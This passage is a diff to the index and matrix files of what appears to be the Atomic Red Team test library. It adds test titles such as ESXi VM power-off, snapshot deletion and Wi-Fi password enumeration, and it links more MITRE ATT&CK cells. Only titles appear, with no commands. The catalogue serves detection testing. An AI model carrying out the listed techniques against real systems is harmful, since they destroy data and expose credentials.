   - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
   - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #11: ESXi - Local Account Discovery via ESXCLI [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
   - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
@@ -1760,6 +1780,8 @@
   - Atomic Test #36: Display volume shadow copies with "vssadmin" [windows]
   - Atomic Test #37: Identify System Locale and Regional Settings with PowerShell [windows]
   - Atomic Test #38: Enumerate Available Drives via gdr [windows]
+  - Atomic Test #39: Discover OS Product Name via Registry [windows]
+  - Atomic Test #40: Discover OS Build Number via Registry [windows]
 - [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
   - Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
@@ -1832,6 +1854,8 @@
   - Atomic Test #2: Discover System Language with chcp [windows]
   - Atomic Test #7: Discover System Language with dism.exe [windows]
   - Atomic Test #8: Discover System Language by Windows API Query [windows]
+  - Atomic Test #9: Discover System Language with WMIC [windows]
+  - Atomic Test #10: Discover System Language with Powershell [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
   - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
@@ -1889,6 +1913,7 @@
   - Atomic Test #2: System Time Discovery - PowerShell [windows]
   - Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
   - Atomic Test #5: System Time with Windows time Command [windows]
+  - Atomic Test #6: Discover System Time Zone via Registry [windows]
 
 # impact
 - T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1912,6 +1937,7 @@
 - [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
   - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+  - Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
 - T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
@@ -1929,6 +1955,7 @@
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
   - Atomic Test #3: Overwrite deleted data on C drive [windows]
+  - Atomic Test #5: ESXi - Delete VM Snapshots [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1490 Inhibit System Recovery](../../T1490/T1490.md)
@@ -1950,6 +1977,7 @@
   - Atomic Test #12: Logoff System - Windows [windows]
   - Atomic Test #13: ESXi - Terminates VMs using pkill [windows]
   - Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [windows]
+  - Atomic Test #15: ESXi - vim-cmd Used to Power Off VMs [windows]
 
 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)

atomics/Indexes/Matrices/linux-matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -12,9 +12,9 @@
 | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -30,7 +30,7 @@
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Non-Application Layer Protocol](../../T1095/T1095.md) |  |
 |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |

atomics/Indexes/Matrices/macos-matrix.md

@@ -12,9 +12,9 @@
